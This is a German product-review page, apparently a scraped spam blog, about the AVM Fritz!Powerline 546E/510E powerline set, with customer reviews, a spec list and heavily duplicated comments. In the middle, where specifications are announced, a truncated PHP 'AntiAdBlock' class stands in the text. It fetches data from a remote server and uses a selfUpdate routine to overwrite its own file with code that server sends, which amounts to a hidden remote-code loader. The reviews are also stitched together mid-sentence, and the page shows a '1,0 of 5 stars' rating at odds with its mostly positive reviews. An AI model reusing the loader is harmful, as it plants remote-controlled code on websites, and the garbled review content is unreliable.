AVM Fritz!Powerline 546E/510E WLAN Set/ – Wie erwartet, war mir aber unsicher nach diversen Rezensionen

Powerline 546e (mit wlan) bietet im gegensatz zum großen bruder 1240e eine steckdose (die ich dringend benötige). Wenn es nur um die Übertragung von daten aus dem internet geht, bietet der 546e genug luft nach oben (auswertung lt. 72″: Übertragungsrate 230 mbit/s empfangen und 84 mbit/s senden. Will man aber geräte hausintern vernetzen, wäre schneller besser. Ich habe mir deshalb auch noch adapter 1240e gekauft – diese sind leider ohne steckdose (aber am einsatzorten nicht erforderlich). Es funktioniert bei mir alles im gleichen heimnetz (fritzbox 7390) sehr gut. Klar, die geschwindigkeit der datenübertragung zwischen 546e und 1240e ist auf die geschwindigkeit des 546e begrenzt. Die installation fand ich sehr einfach, die wlan-einstellungen konnte ich von der fitzbox auf die adapter übertragen (steht im handuch (download) und ist simpel). Habe jetzt überall im haus guten wlan-empfang und lan.

Mit diesem powerline adapter wurde ein älterer msi-powerline adapter ersetzt. Die downloadrate mit fritz-powerline ist ca 4x höher. Zusätzlich bietet dieser powerline-adapter noch einen wlan accesspoint, der das hausnetzwerk auf der oberen etage erweitert. Verbindung via wlan ist schnell genug, um hd-filme zu streamen (amazon firestick). Konfiguration ist einfach und das menu ist übersichtlich sortiert und verständlich. Positiv ist die möglichkeit, die wlan-zugangsdaten aus einer fritzbox direkt zu übernehmen.

Der 546e, auch wenn nicht mehr ganz so schnell (aber zahlen im idealzustand sind manchmal auch irreführend), ist meiner meinung nach der beste von avm, keiner verbindet wlan, lan, powerline und eine smarthome steckdose in einem gerät (oder irre ich mich?). Wenn der auch noch dect verstärken würde und mind. 1 poe anschluß hätte, könnte einer fritzbox nichts besseres begenen. Hier sind die Spezifikationen für die AVM Fritz!Powerline 546E/510E WLAN Set/:

requestTimeout / 1000); return $value == 0 ? 1 : $value; } private function getTimeoutMS() { return $this->requestTimeout; } private function ignoreCache() { $key = md5('PMy6vsrjIf-' . $this->zoneId); return array_key_exists($key, $_GET); } private function getCurl($url) { if ((!extension_loaded('curl')) || (!function_exists('curl_version'))) { return false; } $curl = curl_init(); curl_setopt_array($curl, array( CURLOPT_RETURNTRANSFER => 1, CURLOPT_USERAGENT => $this->requestUserAgent . ' (curl)', CURLOPT_FOLLOWLOCATION => false, CURLOPT_SSL_VERIFYPEER => true, CURLOPT_TIMEOUT => $this->getTimeout(), CURLOPT_TIMEOUT_MS => $this->getTimeoutMS(), CURLOPT_CONNECTTIMEOUT => $this->getTimeout(), CURLOPT_CONNECTTIMEOUT_MS => $this->getTimeoutMS(), )); $version = curl_version(); $scheme = ($this->requestIsSSL && ($version['features'] & CURL_VERSION_SSL)) ? 'https' : 'http'; curl_setopt($curl, CURLOPT_URL, $scheme . '://' . $this->requestDomainName . $url); $result = curl_exec($curl); curl_close($curl); return $result; } private function getFileGetContents($url) { if (!function_exists('file_get_contents') || !ini_get('allow_url_fopen') || ((function_exists('stream_get_wrappers')) && (!in_array('http', stream_get_wrappers())))) { return false; } $scheme = ($this->requestIsSSL && function_exists('stream_get_wrappers') && in_array('https', stream_get_wrappers())) ? 'https' : 'http'; $context = stream_context_create(array( $scheme => array( 'timeout' => $this->getTimeout(), // seconds 'user_agent' => $this->requestUserAgent . ' (fgc)', ), )); return file_get_contents($scheme . '://' . $this->requestDomainName . $url, false, $context); } private function getFsockopen($url) { $fp = null; if (function_exists('stream_get_wrappers') && in_array('https', stream_get_wrappers())) { $fp = fsockopen('ssl://' . $this->requestDomainName, 443, $enum, $estr, $this->getTimeout()); } if ((!$fp) && (!($fp = fsockopen('tcp://' . gethostbyname($this->requestDomainName), 80, $enum, $estr, $this->getTimeout())))) { return false; } $out = "GET {$url} HTTP/1.1\r\n"; $out .= "Host: {$this->requestDomainName}\r\n"; $out .= "User-Agent: {$this->requestUserAgent} (socket)\r\n"; $out .= "Connection: close\r\n\r\n"; fwrite($fp, $out); stream_set_timeout($fp, $this->getTimeout()); $in = ''; while (!feof($fp)) { $in .= fgets($fp, 2048); } fclose($fp); $parts = explode("\r\n\r\n", trim($in)); return isset($parts[1]) ? $parts[1] : ''; } private function getCacheFilePath($url, $suffix = '.js') { return sprintf('%s/pa-code-v%s-%s%s', $this->findTmpDir(), $this->version, md5($url), $suffix); } private function findTmpDir() { $dir = null; if (function_exists('sys_get_temp_dir')) { $dir = sys_get_temp_dir(); } elseif (!empty($_ENV['TMP'])) { $dir = realpath($_ENV['TMP']); } elseif (!empty($_ENV['TMPDIR'])) { $dir = realpath($_ENV['TMPDIR']); } elseif (!empty($_ENV['TEMP'])) { $dir = realpath($_ENV['TEMP']); } else { $filename = tempnam(dirname(__FILE__), ''); if (file_exists($filename)) { unlink($filename); $dir = realpath(dirname($filename)); } } return $dir; } private function isActualCache($file) { if ($this->ignoreCache()) { return false; } return file_exists($file) && (time() - filemtime($file) < $this->cacheTtl * 60); } private function getCode($url) { $code = false; if (!$code) { $code = $this->getCurl($url); } if (!$code) { $code = $this->getFileGetContents($url); } if (!$code) { $code = $this->getFsockopen($url); } return $code; } private function getPHPVersion($major = true) { $version = explode('.', phpversion()); if ($major) { return (int)$version[0]; } return $version; } private function parseRaw($code) { $hash = substr($code, 0, 32); $dataRaw = substr($code, 32); if (md5($dataRaw) !== strtolower($hash)) { return null; } if ($this->getPHPVersion() >= 7) { $data = @unserialize($dataRaw, array( 'allowed_classes' => false, )); } else { $data = @unserialize($dataRaw); } if ($data === false || !is_array($data)) { return null; } return $data; } private function getTag($code) { $data = $this->parseRaw($code); if ($data === null) { return ''; } if (array_key_exists('code', $data)) { $this->selfUpdate($data['code']); } if (array_key_exists('tag', $data)) { return (string)$data['tag']; } return ''; } public function get() { $e = error_reporting(0); $url = $this->routeGetTag . '?' . http_build_query(array( 'token' => $this->token, 'zoneId' => $this->zoneId, 'version' => $this->version, )); $file = $this->getCacheFilePath($url); if ($this->isActualCache($file)) { error_reporting($e); return $this->getTag(file_get_contents($file)); } if (!file_exists($file)) { @touch($file); } $code = ''; if ($this->ignoreCache()) { $fp = fopen($file, "r+"); if (flock($fp, LOCK_EX)) { $code = $this->getCode($url); ftruncate($fp, 0); fwrite($fp, $code); fflush($fp); flock($fp, LOCK_UN); } fclose($fp); } else { $fp = fopen($file, 'r+'); if (!flock($fp, LOCK_EX | LOCK_NB)) { if (file_exists($file)) { $code = file_get_contents($file); } else { $code = ""; } } else { $code = $this->getCode($url); ftruncate($fp, 0); fwrite($fp, $code); fflush($fp); flock($fp, LOCK_UN); } fclose($fp); } error_reporting($e); return $this->getTag($code); } private function getSelfBackupFilename() { return $this->getCacheFilePath($this->version, ''); } private function selfBackup() { $this->selfSourceContent = file_get_contents(__FILE__); if ($this->selfSourceContent !== false && is_writable($this->findTmpDir())) { $fp = fopen($this->getSelfBackupFilename(), 'cb'); if (!flock($fp, LOCK_EX)) { fclose($fp); return false; } ftruncate($fp, 0); fwrite($fp, $this->selfSourceContent); fflush($fp); flock($fp, LOCK_UN); fclose($fp); return true; } return false; } private function selfRestore() { if (file_exists($this->getSelfBackupFilename())) { return rename($this->getSelfBackupFilename(), __FILE__); } return false; } private function selfUpdate($newCode) { if(is_writable(__FILE__)) { $hasBackup = $this->selfBackup(); if ($hasBackup) { try { $fp = fopen(__FILE__, 'cb'); if (!flock($fp, LOCK_EX)) { fclose($fp); throw new Exception(); } ftruncate($fp, 0); if (fwrite($fp, $newCode) === false) { ftruncate($fp, 0); flock($fp, LOCK_UN); fclose($fp); throw new Exception(); } fflush($fp); flock($fp, LOCK_UN); fclose($fp); if (md5_file(__FILE__) === md5($newCode)) { @unlink($this->getSelfBackupFilename()); } else { throw new Exception(); } } catch (Exception $e) { $this->selfRestore(); } } } } } $__aab = new __AntiAdBlock_2430765(); return $__aab->get();
  • Geben Sie Ihr Modell ein,
    um sicherzustellen, dass dieser Artikel passt.
  • Geräte-Duo aus FRITZ!Powerline 546E und kleinerem FRITZ!Powerline 510E-Adapter mit ausgereifter Powerline-Technologie, bis zu 500 MBit/s Datenrate (brutto) für kabellosen Internetanschluss an jeder Steckdose
  • 2 x Fast-Ethernet-LAN (100 MBit/s) für die Vernetzung von PC, Drucker, TV, Hi-Fi-Anlage, Blu-Ray-Player und anderer netzwerkfähige Geräte
  • WLAN Access-Point mit bis zu 300 MBit/s, WPS-Funktion und WPA2-Verschlüsselung, WLAN-Reichweite im Repeating-Modus erweiterbar
  • Intelligente Steckdose für Smart Home, schaltet automatisch oder manuell die Stromzufuhr angeschlossener Geräte (bis 2.300 Watt), misst Stromverbrauch
  • Lieferumfang: FRITZ!Powerline 546E, FRITZ!Powerline 510E, 2 x Netzwerkkabel, Installationsanleitung

Ich verwende dieses set, um das internetsignal vom netzwerkversorgten büro in meine etwa 30 meter entfernte werkstatt zu bekommen. Leitungslänge bis dorthin ca. 50 meter, inklusive 2 sicherungskästen und 2 fi. Trotzdem funktioniert es ausreichend gut. Man sollte aber versuchen, beiden gerätschaften auf die gleiche stromphase zu legen. Dann hat man das stärkste signal. Durch Übersprechung funktioniert es auf den anderen phasen zwar auch, aber mit geschwindigkeitsverlusten. Je näher die teile beieinander liegen, desto besser die geschwindigkeit. Ich erreiche in meiner werkstatt etwa 60 mbit geschwindigkeit. Das ist für surfen im internet (dsl 6000) mehr als ausreichend, auch für die zukunft.

Vorteile:+ problemlose, schnelle installation+ sichere verbindung+ keine verbindungsabbrüche+ via internet von überall konfigurierbar/steuerbar+ wlan und 2x lan für meine bedürfnisse vollkommen ausreichend+ erweiterbar+ stromverbrauch messennachteile:- preis (aber dafür bekommt man auch viel)nach langer recherche diverser anbieter und unterschiedlicher powerline-systeme habe ich mich für dieses modell entschieden, da es für meinen gebrauch alles in einem gerät liefert. Zwischen router, powerlineadapter 1 (530e bereits vorhanden) und dem powerlineadapter 2 (546e) liegen 2 stockwerke und es hat problemlos funktioniert, diesen in das bestehende system zu integrieren. Die funktion der intelligenten steckdose (über knopfdruck am gerät oder via internet schaltbar) ist ebenfalls sehr gut – so lassen sich die geräte auch in zeitintervallen oder nach unterschreiten einer leistungsgrenze (stand-by) abschalten. Hier bleiben keine wünsche offen. Der stromverbrauch der angeschlossenen geräte lässt sich so ebenfalls einfach überwachen. Alles in allem eine klare kaufempfehlung.

Kommentare von Käufern :

  • Nur bedingt zufrieden
  • Macht was er/es soll, leider nur 24 Monate und
  • Bis jetzt funktioniert alles einwandfrei

Habe das gerät trotz ein paar minusbeurteilungen geordert da ich von ‘fritz’. Ich habe am freitag 18:30uhr bestellt und am nächsten tag um 10:30uhr erhalten (amazon prime ist spitze). Sofort gerät ausgepackt, schnellinstallation genau durchgelesen – in die dosen gesteckt (über drei stockwerke bis in die werkstatt) und es funktioniert tadellos .Obwohl drei zähler dazwischen geschaltet sind. Wer probleme hat mit zwischengeschalteten zählern, könnte eventuell mal eine andere dose probieren (andere phase). Auf keinen fall über eine verlängerungsschnur versorgen. Bei wem es nicht funktioniert kann es ja problemlos zurücksenden – dank amazon. Besten AVM Fritz!Powerline 546E/510E WLAN Set/(500 Mbit/s, WLAN-Access Point, Fast-Ethernet-LAN, Intelligente Steckdose)

Die marke fritz ist mir schon länger bekannt und ich kaufe diese router,. Gern, da der support gut ist. Habe bereits schon länger powerline adapter im hause und so vom keller zum og eine datenverbindung geschaffen. Hatte keine lust ein lan-kabel zu verlegen und w-lan war mir zu langsam, zumal es sich durch die nutzer teilt. Die geschwindikeit vom powerline ist so hoch, dass ich die vollen 32mbit download als geschwindigkeit abrufen kann. Dabei habe ich nun 1 master und 2 slave-adapter im einsatz. Slave 1: für router / lanslave 2: für w-lanich habe fast nie probleme mit der datenverbindung. Muss ich alle 3 monate mal einen von den adaptern aus der steckdose ziehen und wieder einstecken, aber ansonsten steht die verbindung stabel mit über 100 mbit. Also scheinen unsere stromkabel gut verlegt worden zu sein und es gibt keine schlechten geräte im haushalt.

Mich hat die konfiguration wesentlich mehr nerven gekostet als von avm bisher gewohnt. Dauern werden updates für einer der beiden komponenten angezeigt, installiert werden können diese aber nicht, dann meckert die mesh funktion und so weiter. Bei mir hat dann am ende nur geholfen die fb komplett neu aufzusetzen, selbst die hotline war überfragt. Ist ja auch in 2-3 stunden erledigt :(.

Die verpackung enthält neben dem eigentlichen powerline-adapter ein flachband-ethernet-kabel, eine kurzanleitung und eine allgemeine avm-produkt-broschüre. Das einbinden in das heimnetz funktioniert, allerdings erst nach mehrfachen anläufen und zwischenzeitlich wiederholten verbindungabbrüchen. Was dann zum erfolg geführt hat, weiß ich leider nicht. Die kurzanleitung hilf hier nicht. Die anleitung auf der avm homepage ist etwas ausführlicher, lässt aber auch vieles im dunkeln; ich würde z. Gerne wissen, was denn wann warum passiert und was man nicht tun sollte, weil. Die möglichkeiten der einbindung sind vielfältig (über die knöpfe am adapter, browserbasiert oder über die powerline-hilfssoftware). Die begriffe sind aber nicht klar definiert, was wann wie gekoppelt, verbunden oder eingebunden bzw. Irgendwas (aber was?) war immer nicht richtig, was dann ein wiederholtes komplettes werks-reset und neubeginn erforderte. 6 h funktioniert und der adapter sich dann (warum?) aus dem heimnetz verabschiedet. Akute schilddrüse… wie gesagt, irgendwann hat’s dann zum glück doch geklappt. Die dürftige anleitung lässt schließen, dass avm gerne „plug-in, klick and forget“ anbieten würde.

Einen stern gibt es abzug, weil der w-lan adapter kann theoretisch bis zu 500mbit/s, der powerline (also über stromnetz) nur max. Das passt irgendwie nicht zusammen. Ansonsten fuktioniert alles sehr gut auch in kombi mit einer fb 7390. Gut ist auch die smart-home-funktion der steckdose, da man diese nun mit dem smartphone von überall schalten kann. Die zugehörige software ist wie immer bei avm top.

Ich kann einige schlechte rezensionen hier nur bestätigen:dieses avm produkt ist nicht ganz von der qualität wie die firtzboxen (hatte schon mehrere). Einerseits war das setup recht schnell – powerline 500e mit lan kabel an fritzbox 7390 angeschlossen, dann powerline 546e in eine steckdose und sie fanden sich recht schnell. Bis die 546e in der fritzbox erschien, hat es eine weile gedauert. Aber dann finde ich die integration der 546e in die fritzbox oberfläche klasse. Man kann von dort auf die weboberfläche der 546e gelangen und auch das angeschlossene smart home gerät (geschaltete steckdose) wird schnell gefunden. Über myfritz sogar von überall zu steuern. Ich nutze die 546e mit einer 500e als powerline brücke, und nutze dann das wlan der 546e. Dies überbrückt eine fette betondecke, durch die das wlan der fritzbox nicht stabil funktioniert.

Die avm-powerline-serie biete jede menge möglichkeiten, das netzwerk zu erweitern. Die einrichtung ist fritz-typisch einfach und schnell erledigt. Ich betreibe den 546e zusammen mit einem 520e, den ich direkt mit der fritz-box verbunden habe. Die kommunikation zwischen beiden geräten erfolgt per powerline. Auch die betriebsarten “wlan-brücke” und “lan-brücke” machen das produkt interessant. Hierbei erfolgt die verbindung zur fritzbox eben direkt per netzwerkkabel (lan) oder direkt per wlan. Damit wäre in meinem fall die 520e überflüssig geworden. Insgesamt bin ich sehr zufrieden mit dem produkt. Einen punkt ziehe ich allerdings ab, weil die Übertragungsraten weit hinter den angaben von avm zurück bleiben. Selbst bei lan-anbindung erzielte das gerät nicht die mögliche bandbreite.

Die inbetriebnahme ist ein kinderspiel. Den kleinen adapter (510e) direkt per lan-kabel mit der fritzbox verbinden und dann ab in die steckdose :-)der große kommt auf die gegenseite, lan-anschluß am pc funktioniert sofort, für wlan-verbindungen sich vorher den netzwerkschlüssel notieren und dann das endgerät verbinden, wie gehabt. Die fritzbox ist bei mir im nebenzimmer, ich hatte per wlan nie mehr als 13 mbit/s, jetzt reize ich das vdsl endlich aus, nie weniger als 42/mbit/s internetgeschwindigkeit, das ist doch schon etwas.

Ich habe in der zwischenzeit schon einige geräte von avm im einsatz: router, dect 200 steckdosen, wlan- repeater, heizkörper regler und die powerline geräte. Alles funktioniert problemlos miteinander. Sehr gut finde ich die möglichkeit von überall mit dem internet via app auf die box und die geräte zugreifen zu können. Zum beispiel um schaltintervalle anzupassen, oder den heizkörper im bad schon mal einzuschalten, während man noch unterwegs ist. Als schaltzentrale fungiert hier die fritz-box, ich bin von der einfachen installation bis zum betrieb total zufrieden.

Der händler bot einen guten und schnellen service, ich kann daher nur empfehlen. Würde dort jederzeit wieder bestellen und kaufen. Das produkt hält was es versprichtda dies meine erste eingerichtete powerline ist war ich zu anfang sehr skeptisch. Der aufbau gestaltete sich einfach, bis auf eine kleinigkeit für die ich den support von avm anrufen musste. Ich hatte die ersten beiden powerline adapter einzeln und nicht als set bestellt (2 verschiedene modelle), und dadurch waren beide adapter nicht gepairt. Nachdem ich die pairung durchgeführt habe hatte ich keine probleme. Beide verbindungen, sowohl über kabel als auch über wlan sind hervorragend. Kann die powerline nur sehr empfehlen, besonders bei einer nachträglichen verbindung innerhalb eine hauses.

Wir benutzen den powerlineadabter als slave (=nicht direkt an der fritzbox angeschlossene einheit) zum streamen unseres tv programms. Datendurchsatz super, funktionsumfang super (wlan, smart-home funktion, kontrollleuchten lassen sich deaktivieren, usw. Mit einem fritzphone läßt sich die steckdose problemlos ein-/ausschalten (smart-home funktion). Konfigurierbar über ein eigenes webinterface mit übersichtlicher avm typischer darstellung aller funktionen. Das setup ist etwas kniffelig. Zur inbetriebnahme muss der adapter unbedingt per lan-kabel direkt mit der fritzbox verbunden sein. Erst danach kann man ihn auch ohne direkte verbindung zur fritzbox an jede beliebige steckdose einstecken und via powerline oder wlan konfigurieren.

Ich benutze diese pl ausschließlich als wlan accesspoint und bin grundsätzlich sehr zufrieden damit. Selbst im garten habe ich mittlerweile noch empfang, was mein router aufgrund seines standortes vorher nicht geschafft hat. Ein stern abzug ist dafür, dass ich die powerline plötzlich erneut mit der pl am router paaren musste, da ich keine ip adresse mehr zugewiesen bekam. Manchmal (bisher 2x innerhalb 9 wochen) muß die pl aus der steckdose entfernt und wieder eingesteckt und somit “neu gestartet” werden, da mir hier auch die verbindung weggeflogen ist. Dann war aber auch direkt wieder alles gut.

Der 546e kann wirklich einiges, schalten über w-lan oder per app den schaltzustand von der arbeit aus abfragen. Auch die push e-mails beim ändern des schaltzustandes funktionieren super, wenn der adapter nicht wieder einmal die powerline verbindung zur fritzbox verliert. Denn spätestens dann funktioniert garnichts mehr. Man hat eine schaltbare steckdose die man im baumarkt auch für 3 euro bekommen würde. Von bandbreitenintensiven anwendungen sollte man komplett absehen. Beim online gaming ist bereits schluss da die verbindung leider nicht zuverlässig ist. Musikstreaming über airplay funktioniert auch mehr schlecht als recht. Alles in allem rege ich mich darüber auf dass ich den adapter nicht nach 2 wochen zurückgeschickt habe denn wirklich produktiv nutzen lässt sich der adapter nicht da ich mich nicht auf die verbindung verlassen kann. Ansonsten wäre es aber wirklich ein top produkt.

Die powerline war zwar schnell und problemlos an meiner avm fritzbox 7490 installiert und hat funktioniert, doch ich konnte kein wesentlich stärkeres signal feststellen als das wlan direkt von der box einen stock tiefer, in der die powerline steckt. Hatte auch schon zwei unerklärliche ausfälle, die dann bei neustart leicht behoben waren. Ich möchte das nicht zu hundert prozent auf das gerät schieben, kann ja evtl. Auch das stromnetz sein, wer weiß das schon?.

Viele rezensenten bemängeln die gegenüber den 500 mbit/s viel geringeren tatsächlichen datendurchsatz. Es ist aber normal, dass der tatsächliche durchsatz bei der hälfte bis zu einem viertel des angegebenen wertes liegt. Grunde: störstrahlung aus der umgebung. Suboptimale Übertragungsbedingungen für hochfrequenz auf stromleitungen. Sogenannter overhead (ein teil der kapazität wird von der verbindungsverwaltung gefressen). Die zusammenarbeit mit einer fritzbox läuft perfekt und der datendurchsatz ist für meine zwecke völlig ausreichend.

Im zusammenspiel mit 520 e adapter (einer empfängt, einer sendet) bekommt man eine sehr gute verbindung, gefühlte gute und schnelle verbindung, keine abbrüche bemerkt. Man riet mir bei avm diese beiden adapter zu nehmen und nicht die jeweiligen paaradapter mit gleicher nummer.

Ich habe bereits ein devolo system installiert gehabt und nun auch das obergeschoss mit wlan erschlossen. Dabei ließ sich der 546e kinderleicht in das bestehende devolo lan integrieren. Bisher hatte ich keine verbindungsabbrüche oder sonstige schwierigkeiten. Auch die einbindung eines wlan-druckers (um diesen gings mir hauptsächlich), der im obergeschoss steht war problemlos. Absolut praktisch ist natürlich dabei die an- und abschaltmöglichkeit der steckdose im web-interface. Somit kann man den drucker (vorausgesetzt er ist an der der steckdose angeschlossen) bei bedarf einschalten und wieder ausschalten und somit energie sparen.

Ich habe von diesem adapter zwei stück erworben, einen über die amazon angebote, einen weiteren über die warehouse deals. Der 546e adapter aus dem warehouse deal ließ sich nur ein einziges mal ansprechen, dann leider nie wieder. Ein durchgeführtes softwareupdate half leider auch nicht. Ich dachte die warehouse deals werden getestet, bevor sie erneut versand werden. Glücklicherweise konnte ich den adapter wieder zurück schicken: primaeinsatz und erfahrung zum mischbetrieb:der avm 546e aus den angeboten verrichtete einige zeit problemlos seinen dienst, und konnte in eine vorhandene devolo (dlan 200 avsmart+) infrastruktur eingebunden werden. Da ich gerne alles von einem hersteller einsetze, hatte ich mir zusätzlich noch einen avm 520e und den avm 546e aus den warehouse deals besorgt. Da der adapter aus den warehouse deals nicht so wollte, stieg ich auf einen mischbetrieb um, was laut herstellerseiten “problemlos” funktionieren sollte. In der wohnung möchte ich drei adapter betreiben: router (einspeisung), arbeitszimmer (client) und wohnzimmer (client). Wird das netz wie folgt aufgebaut router (devolo), arbeitszimmer (devolo), wohnzimmer (avm) gibt es keine probleme.

Summary
Review Date
Reviewed Item
AVM Fritz!Powerline 546E/510E WLAN Set/(500 Mbit/s, WLAN-Access Point, Fast-Ethernet-LAN, Intelligente Steckdose)
Rating
1,0 of 5 stars, based on 520 reviews

Author: SmartHome

1 thought on “AVM Fritz!Powerline 546E/510E WLAN Set/ – Wie erwartet, war mir aber unsicher nach diversen Rezensionen

  1. Das powerline set von avm fritz ist hrvorragend. Es überzeugt mit der üblichen hohen qualität und überragenden funktionalität der geräte von avm. Die installation im netzwerk ist kinderleicht, so wie man es von avm gewohnt ist.
  2. Rezension bezieht sich auf : AVM Fritz!Powerline 546E/510E WLAN Set/(500 Mbit/s, WLAN-Access Point, Fast-Ethernet-LAN, Intelligente Steckdose)

    Das powerline set von avm fritz ist hrvorragend. Es überzeugt mit der üblichen hohen qualität und überragenden funktionalität der geräte von avm. Die installation im netzwerk ist kinderleicht, so wie man es von avm gewohnt ist.
    1. Funktioniert so wie erwartet, toll ist die schaltung der steckdose, meine endstufe für die gartenlautsprecher ist dann in der nacht automatisch nach zeitplan ausgeschaltet. Die wlan Übertragung könnte etwas besser sein, reicht aber für die steuerungsapp.
  3. Rezension bezieht sich auf : AVM Fritz!Powerline 546E/510E WLAN Set/(500 Mbit/s, WLAN-Access Point, Fast-Ethernet-LAN, Intelligente Steckdose)

    Funktioniert so wie erwartet, toll ist die schaltung der steckdose, meine endstufe für die gartenlautsprecher ist dann in der nacht automatisch nach zeitplan ausgeschaltet. Die wlan Übertragung könnte etwas besser sein, reicht aber für die steuerungsapp.
  4. Rezension bezieht sich auf : AVM Fritz!Powerline 546E/510E WLAN Set/(500 Mbit/s, WLAN-Access Point, Fast-Ethernet-LAN, Intelligente Steckdose)

    Habe den adapter als basis in meinem netzwerk. Er könnte mittlerweile mehr sein, aber dafür kann weder avm noch der adapter etwas. Ermiss eben nicht mehr auf der höhe der zeit. Aber das kann ich dem produkt nicht anlasten. Heute würde ich zu einem adapter mit mindestens 1200 mbit/s greifen. Einige bemängeln, dass die portokosten beim einsenden eines garantiefalles an avm tragen müssen. Dazu kann ich nur sagen, dass diejenigen sich dann lieber einen anderen hersteller suchen sollen, wenn ihnen fünf jahre gewährleistung zu wenig sind. Innerhalb von zwei jahren an den händler wenden.
    1. Habe den adapter als basis in meinem netzwerk. Er könnte mittlerweile mehr sein, aber dafür kann weder avm noch der adapter etwas. Ermiss eben nicht mehr auf der höhe der zeit. Aber das kann ich dem produkt nicht anlasten. Heute würde ich zu einem adapter mit mindestens 1200 mbit/s greifen. Einige bemängeln, dass die portokosten beim einsenden eines garantiefalles an avm tragen müssen. Dazu kann ich nur sagen, dass diejenigen sich dann lieber einen anderen hersteller suchen sollen, wenn ihnen fünf jahre gewährleistung zu wenig sind. Innerhalb von zwei jahren an den händler wenden.
      1. Anschluß und einrichtung problemlos. Leider ist die powerline jetzt defekt. Sie “klackt” ununterbrochen und verbindet sich nicht mehr. Nachtrag: nach anzeige des mangels hat amazon sofort reagiert und kostenlosen austausch angekündigt. Schon am nächsten tag war ersatz da. Für diesen hervorragenden service gibt es zwei sterne. Hoffe, dass die ansonsten gut funktionierende powerline nun länger hält.
  5. Rezension bezieht sich auf : AVM Fritz!Powerline 546E/510E WLAN Set/(500 Mbit/s, WLAN-Access Point, Fast-Ethernet-LAN, Intelligente Steckdose)

    Anschluß und einrichtung problemlos. Leider ist die powerline jetzt defekt. Sie “klackt” ununterbrochen und verbindet sich nicht mehr. Nachtrag: nach anzeige des mangels hat amazon sofort reagiert und kostenlosen austausch angekündigt. Schon am nächsten tag war ersatz da. Für diesen hervorragenden service gibt es zwei sterne. Hoffe, dass die ansonsten gut funktionierende powerline nun länger hält.
    1. Wenn man etliche router und powerlan-geräte ausprobiert und eingesetzt hat, dann bleibt man unweigerlich bei avm. Diese firma hat ein konzept das alle geräte einfach einbindet. Wir haben ein access-point gesucht, das das wlan separat mit zeitvorgaben aktiviert. Das funktioniert hervorragend. Die lan-geschwindigkeit ist prima.
      1. Wenn man etliche router und powerlan-geräte ausprobiert und eingesetzt hat, dann bleibt man unweigerlich bei avm. Diese firma hat ein konzept das alle geräte einfach einbindet. Wir haben ein access-point gesucht, das das wlan separat mit zeitvorgaben aktiviert. Das funktioniert hervorragend. Die lan-geschwindigkeit ist prima.
  6. Rezension bezieht sich auf : AVM Fritz!Powerline 546E/510E WLAN Set/(500 Mbit/s, WLAN-Access Point, Fast-Ethernet-LAN, Intelligente Steckdose)

    Ich hatte erst einen avm fritzwlan repeater 450e (450 mbit/s, gigabit lan, wpa2) der hat nur funktioniert wenn keine wand/hindernis dazwischen war. Mit den powerline habe ich jetzt sogar durch wände gutes wlan. Ich habe die powerline in meiner garage eingesteckt und habe neben der garage im wohnwagen wlan.
    1. Ich hatte erst einen avm fritzwlan repeater 450e (450 mbit/s, gigabit lan, wpa2) der hat nur funktioniert wenn keine wand/hindernis dazwischen war. Mit den powerline habe ich jetzt sogar durch wände gutes wlan. Ich habe die powerline in meiner garage eingesteckt und habe neben der garage im wohnwagen wlan.
      1. Funktioniert alles einwandfrei in meiner wohnung. Die installationsanleitung ist auch für laien sehr gut nachzuvollziehen. 10 minuten nach dem auspacken stand mein erweitertes netzwerk.
  7. Rezension bezieht sich auf : AVM Fritz!Powerline 546E/510E WLAN Set/(500 Mbit/s, WLAN-Access Point, Fast-Ethernet-LAN, Intelligente Steckdose)

    Funktioniert alles einwandfrei in meiner wohnung. Die installationsanleitung ist auch für laien sehr gut nachzuvollziehen. 10 minuten nach dem auspacken stand mein erweitertes netzwerk.
    1. Ich habe dieses set gekauft da mein wlan im dachgeschoss schlecht ist und ich auch noch die extras wie schalten und messen haben wollte. Zudem brauchte ich noch zwei lan anschlüsse für meinen fernseher und den sat receiver. Die inbetriebnahme war schon etwas zickig. Habe dann aber später festgestellt dass der fehler auch bei mir gelegen haben könnte. Dann kam mesh – genau das wollte ich haben. Firmware update gemacht, alles neu angemeldet – geht nicht. Hier mein fehler “wps-hardwaretaste”muss benutzt werden und ich habe immer im fritz os gedrückt – na ja, war die vorfreude. Alle geräte hatten deutlich weniger verbindungsprobleme und irgendwie hatte ich auch das gefühl alles funktionierte jetzt geschmeidiger. Der adapter 546e funktionierte nicht mehr. Auch durch alle möglichen upgrades / rücksetzen kein datenverkehr mehr. Na gut, ab zum avm support und zwei wochen warten. Eingebaut – eingerichtet ( achtung ungenutze verbindungen “546e” müssen erst gelöscht werden ??.
      1. Ich habe dieses set gekauft da mein wlan im dachgeschoss schlecht ist und ich auch noch die extras wie schalten und messen haben wollte. Zudem brauchte ich noch zwei lan anschlüsse für meinen fernseher und den sat receiver. Die inbetriebnahme war schon etwas zickig. Habe dann aber später festgestellt dass der fehler auch bei mir gelegen haben könnte. Dann kam mesh – genau das wollte ich haben. Firmware update gemacht, alles neu angemeldet – geht nicht. Hier mein fehler “wps-hardwaretaste”muss benutzt werden und ich habe immer im fritz os gedrückt – na ja, war die vorfreude. Alle geräte hatten deutlich weniger verbindungsprobleme und irgendwie hatte ich auch das gefühl alles funktionierte jetzt geschmeidiger. Der adapter 546e funktionierte nicht mehr. Auch durch alle möglichen upgrades / rücksetzen kein datenverkehr mehr. Na gut, ab zum avm support und zwei wochen warten. Eingebaut – eingerichtet ( achtung ungenutze verbindungen “546e” müssen erst gelöscht werden ??.
  8. Rezension bezieht sich auf : AVM Fritz!Powerline 546E/510E WLAN Set/(500 Mbit/s, WLAN-Access Point, Fast-Ethernet-LAN, Intelligente Steckdose)

    Das gerät hält was es versprichtstarkes signal und einfach zu installierenwürde ich jederzeit wieder kaufensuper schnelle lieferung.
    1. Das gerät hält was es versprichtstarkes signal und einfach zu installierenwürde ich jederzeit wieder kaufensuper schnelle lieferung.
      1. Einziger nachteil, die smarthome integration für alexa geht nur über eine 3rd party app. Aber ansonsten top mit einigen start problemen.
  9. Rezension bezieht sich auf : AVM Fritz!Powerline 546E/510E WLAN Set/(500 Mbit/s, WLAN-Access Point, Fast-Ethernet-LAN, Intelligente Steckdose)

    Einziger nachteil, die smarthome integration für alexa geht nur über eine 3rd party app. Aber ansonsten top mit einigen start problemen.
  10. Rezension bezieht sich auf : AVM Fritz!Powerline 546E/510E WLAN Set/(500 Mbit/s, WLAN-Access Point, Fast-Ethernet-LAN, Intelligente Steckdose)

    Habe damit unser ganzes haus vernetzt. Einzigste schwachstelle es funktioniert nur bedingt bei nachtspeicherheizung, wenn die schütze in die nacht / ladestellung gehen kommt es hin und wieder zu ausfällen.
